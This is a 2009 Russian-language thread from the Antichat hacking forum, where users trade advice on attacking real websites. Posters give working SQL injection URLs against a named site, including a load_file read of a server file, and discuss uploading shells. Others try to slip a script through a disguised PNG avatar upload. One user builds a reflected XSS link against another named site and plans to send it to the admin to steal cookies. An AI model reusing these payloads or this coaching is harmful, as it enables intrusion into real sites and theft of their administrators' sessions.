HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.09.2009, 16:15
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

В твоем случае не зальёшь.

1. Кавычки экранируется, о чем сообщает ошибка
Код:
http://tipik.ru/outtop.php?uid=-238+union+select+'hello'
Цитата:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/gener123/domains/tipik.ru/public_html/outtop.php on line 12
2. file_priv = N
Код:
http://tipik.ru/outtop.php?uid=-238+union+select+load_file(0x2F686F6D652F67656E65723132332F646F6D61696E732F746970696B2E72752F7075626C69635F68746D6C2F6F7574746F702E706870)
Цитата:
Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.
Я еще ни разу не видел маны по скулям, где описана конкретная версия БД. ЗЫ: В 4й и 5й ветке шеллы льются одинаково. Читай:

Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд

От себя рекомендую (сам по этой статье учился):
SQL injection полный FAQ
 
Ответить с цитированием

  #2  
Старый 02.09.2009, 18:58
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Есть скрипт загрузки аватарок.
Загружаю.
В пост запросе :
Content: image/png.
Загружается всё.
И так создаю файл ava.png
Открываю блокнотом.
Вписываю
Цитата:
<script>alert();</script>
.
Заливаю, подменяю на image/png. (До этого просто text/html)
Открываю в браузере, есть текст
Цитата:
<script>alert();</script>
В исходнике тоже.
Но невыполняется.
что делать?
 
Ответить с цитированием

  #3  
Старый 02.09.2009, 19:30
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Content: image/png.
Может Content-type?

Цитата:
В исходнике тоже.
Но невыполняется.
что делать?
Включи сниффер, посмотри ответ скрипта:
Код:
Content-Type: text/plain
text/plain - обычный текст.
text/html - HTML.

Т.е. теги не будут интерпретироваться, если браузер получит ответ text/plain.
Чтобы они интерпретировались, надо ответ text/html.
 
Ответить с цитированием

  #4  
Старый 03.09.2009, 07:47
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от mailbrush  
Может Content-type?


Включи сниффер, посмотри ответ скрипта:
Код:
Content-Type: text/plain
text/plain - обычный текст.
text/html - HTML.

Т.е. теги не будут интерпретироваться, если браузер получит ответ text/plain.
Чтобы они интерпретировались, надо ответ text/html.
Ну да, просто я не запомнил
Примерно написал.
Сейчас проверю.
 
Ответить с цитированием

  #5  
Старый 02.09.2009, 20:07
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Цитата:
Т.е. теги не будут интерпретироваться, если браузер получит ответ text/plain.
В IE7, IE6 будет
 
Ответить с цитированием

  #6  
Старый 03.09.2009, 19:02
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
По умолчанию

Я зашёл на сайт http://www.mymanual.ru/ и там в поиск дал скрипт xss: "><script>alert('xss')</script>
Мой вопрос: Как превратить это в форму для адресной строки, тоесть превратить этот xss в ссылку, или вы превратите и дайте мне ссылку а я сам уже пойму.
 
Ответить с цитированием

  #7  
Старый 03.09.2009, 19:16
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
По умолчанию

Я зашёл на ссылку http://www.mymanual.ru/search.html?q="><script>alert('xss')</script>&srcht=manuals
Но никакой окошки xss не вышло. ??????????????
 
Ответить с цитированием

  #8  
Старый 03.09.2009, 19:31
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
По умолчанию

Я так понял: Я сохраняю его как html и отпраляю админу, но тогда куки не пойдут через сайт http://www.mymanual.ru/
Как я понял нужно чтобы взять куки с сайта http://www.mymanual.ru/, нужно поставить код здесь: http://www.mymanual.ru/код
Верно?
 
Ответить с цитированием

  #9  
Старый 03.09.2009, 19:35
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
По умолчанию

Ааа..... всё понятно, вот сделал и залил на хост, вот ссылке к xss для сайта http://www.mymanual.ru/ : http://cehennem.hut1.ru/okasj9as8989v89cvxczxuiojxuxuiovjizxc.html
 
Ответить с цитированием

  #10  
Старый 03.09.2009, 19:36
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
По умолчанию

Супер, узнал как правильно можно сохранить отделно в файле .html и залит на хост xss.
Спасибо. +1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.